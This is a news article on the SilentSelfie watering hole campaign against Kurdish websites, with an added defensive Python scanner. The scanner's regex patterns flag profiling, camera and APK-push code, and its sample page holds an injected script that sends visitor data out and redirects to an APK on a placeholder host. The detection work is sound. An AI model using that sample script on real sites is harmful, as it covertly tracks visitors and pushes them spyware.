Websites Targeted in Watering Hole Attack Distributing Spyware

Over 25 websites tied to the Kurdish community have fallen victim to a watering hole attack, which has been active for more than a year and a half, aimed at gathering sensitive data. The campaign, called “SilentSelfie,” was first detected in December 2022 and continues to operate, according to a recent report.

The compromised sites, which include Kurdish media outlets, the Rojava administration, armed forces, and organizations across Türkiye and Kurdish regions, were infected with malicious scripts that deployed four different versions of an information-stealing framework. The simplest of these variants only gathered basic user location data, while the more advanced strains could access the user’s selfie camera and prompt the installation of malicious Android APK files.

The exact method of compromise for these websites remains unclear, but security experts believe this attack represents a new, unidentified threat group. Previously, Kurdish communities have been targeted by threat actors like StrongPity and BladeHawk. A similar attack, revealed earlier in the year, involved Kurdish sites in the Netherlands, attributed to a Türkiye-linked group known as Sea Turtle.

The malicious scripts used in this attack are capable of collecting a wide range of visitor data, including device specifications, battery status, browser language, location, and public IP address. In some cases, the scripts redirect users to infected Android applications. For example, one Android app linked to the attacks embeds the compromised website into a WebView, allowing it to secretly gather information such as contact lists, files stored in external storage, and the user’s location, depending on the permissions granted.
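For defenders reviewing a site they suspect has been compromised, the profiling APIs listed above are a usable static signature. The following is an added example (not code from the report or from the campaign): it pulls inline scripts out of fetched HTML, records which visitor-profiling capabilities each one combines, and buckets them roughly along the variant tiers the report describes. The regex patterns and the sample HTML are constructed here for illustration.

```python
import re

# Browser APIs the report says the injected scripts combined; assumed patterns.
CAPABILITIES = {
    "battery": r"navigator\.getBattery\s*\(",
    "language": r"navigator\.languages?\b",
    "geo": r"navigator\.geolocation\.(getCurrentPosition|watchPosition)",
    "device": r"navigator\.(userAgent|platform|hardwareConcurrency|deviceMemory)\b",
    "camera": r"mediaDevices\.getUserMedia\s*\(",
    "apk": r"""['"][^'"]+\.apk['"]""",
}
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)

def extract_scripts(html: str) -> list[str]:
    """Bodies of all inline <script> blocks (where injected loaders usually sit)."""
    return [m.group(1) for m in SCRIPT_RE.finditer(html)]

def profile_script(js: str) -> set[str]:
    """Capability names whose pattern appears in one script body."""
    return {name for name, pat in CAPABILITIES.items() if re.search(pat, js)}

def classify(caps: set[str]) -> str:
    """Triage bucket mirroring the report's variant tiers."""
    if "camera" in caps or "apk" in caps:
        return "high"    # selfie camera access or APK push: advanced variants
    if "geo" in caps and len(caps) >= 2:
        return "medium"  # location combined with other fingerprinting
    return "low" if caps else "none"

def scan_page(html: str) -> list[tuple[str, set[str]]]:
    """Classify every inline script on a fetched page."""
    return [(classify(c), c) for c in map(profile_script, extract_scripts(html))]

# Constructed sample page: one ordinary snippet, one injected profiler.
SAMPLE_HTML = """
<script>document.documentElement.lang = navigator.language;</script>
<script>
navigator.getBattery().then(b => send({level: b.level}));
navigator.geolocation.getCurrentPosition(p => send(p.coords));
navigator.mediaDevices.getUserMedia({video: true}).then(upload);
location.href = 'https://cdn.example.invalid/app.apk';
</script>
"""

if __name__ == "__main__":
    for severity, caps in scan_page(SAMPLE_HTML):
        print(severity, sorted(caps))
```

A single "low" hit (a page reading `navigator.language` to set its locale) is normal; a "high" script on a news site that has no reason to open the camera is what merits pulling the page source for a closer look.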

Although the malicious RojNews app has no persistence mechanism, its malicious behaviour activates as soon as the targeted user opens it. Ten seconds after launch, the app’s “LocationHelper” service begins sending the user’s location data to a hidden URL and awaits further commands.

Researchers have not been able to definitively identify the group behind SilentSelfie, but some speculate that it could be linked to the Kurdistan Regional Government of Iraq. This theory stems from the arrest of RojNews journalist Silêman Ehmed by local forces, followed by his imprisonment in 2024.

Though not technically sophisticated, the SilentSelfie campaign is notable for its extended duration and the number of Kurdish sites it has compromised. It appears to be the work of a relatively inexperienced or newly emerged threat actor with limited technical capabilities.

To reduce the risk of falling victim to watering hole attacks like SilentSelfie, users and organizations should keep their systems and applications up to date with security patches. Installing reliable anti-virus software, avoiding suspicious downloads, and being cautious of unfamiliar APKs are also key preventive measures.